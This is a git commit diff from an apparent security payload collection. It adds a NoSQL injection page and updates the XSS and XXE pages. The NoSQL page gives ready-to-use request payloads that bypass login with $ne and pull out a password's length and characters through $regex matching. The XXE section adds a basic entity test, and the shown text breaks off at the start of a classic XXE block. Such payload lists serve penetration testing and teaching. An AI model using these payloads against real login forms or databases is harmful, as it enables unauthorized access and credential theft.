NOSQL injection added + updates XSS/XXE

This commit is contained in:
swisskyrepo 2016-10-30 18:53:32 +07:00
parent a9fe14fa29
commit d0e164b6b1
3 changed files with 44 additions and 1 deletions

29
NoSQL injection/README.md Normal file
View File

@ -0,0 +1,29 @@
# NoSQL injection
NoSQL databases provide looser consistency restrictions than traditional SQL databases. By requiring fewer relational constraints and consistency checks, NoSQL databases often offer performance and scaling benefits. Yet these databases are still potentially vulnerable to injection attacks, even if they aren't using the traditional SQL syntax.
## Exploit
Basic authentication bypass using not equal ($ne)
```
username[$ne]=toto&password[$ne]=toto
```
Extract length information
```
username[$ne]=toto&password[$regex]=.{1}
username[$ne]=toto&password[$regex]=.{3}
```
Extract data information
```
username[$ne]=toto&password[$regex]=m.{2}
username[$ne]=toto&password[$regex]=md.{1}
username[$ne]=toto&password[$regex]=mdp
username[$ne]=toto&password[$regex]=m.*
username[$ne]=toto&password[$regex]=md.*
```
## Thanks to
* https://www.dailysecurity.fr/nosql-injections-classique-blind/
* https://www.owasp.org/index.php/Testing_for_NoSQL_injection

View File

@ -242,4 +242,8 @@ Use JSFuck to encode the payload (alert())
## Thanks to
* https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot
* tbm
* tbm
* http://infinite8security.blogspot.com/2016/02/welcome-readers-as-i-promised-this-post.html
* http://www.thespanner.co.uk/2014/03/21/rpo/
* http://blog.innerht.ml/rpo-gadgets/
* http://support.detectify.com/customer/portal/articles/2088351-relative-path-overwrite

View File

@ -3,6 +3,16 @@ An XML External Entity attack is a type of attack against an application that pa
## Exploit
Basic Test
```
<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY example "Doe"> ]>
<userInfo>
<firstName>John</firstName>
<lastName>&example;</lastName>
</userInfo>
```
Classic XXE
```
<?xml version="1.0"?>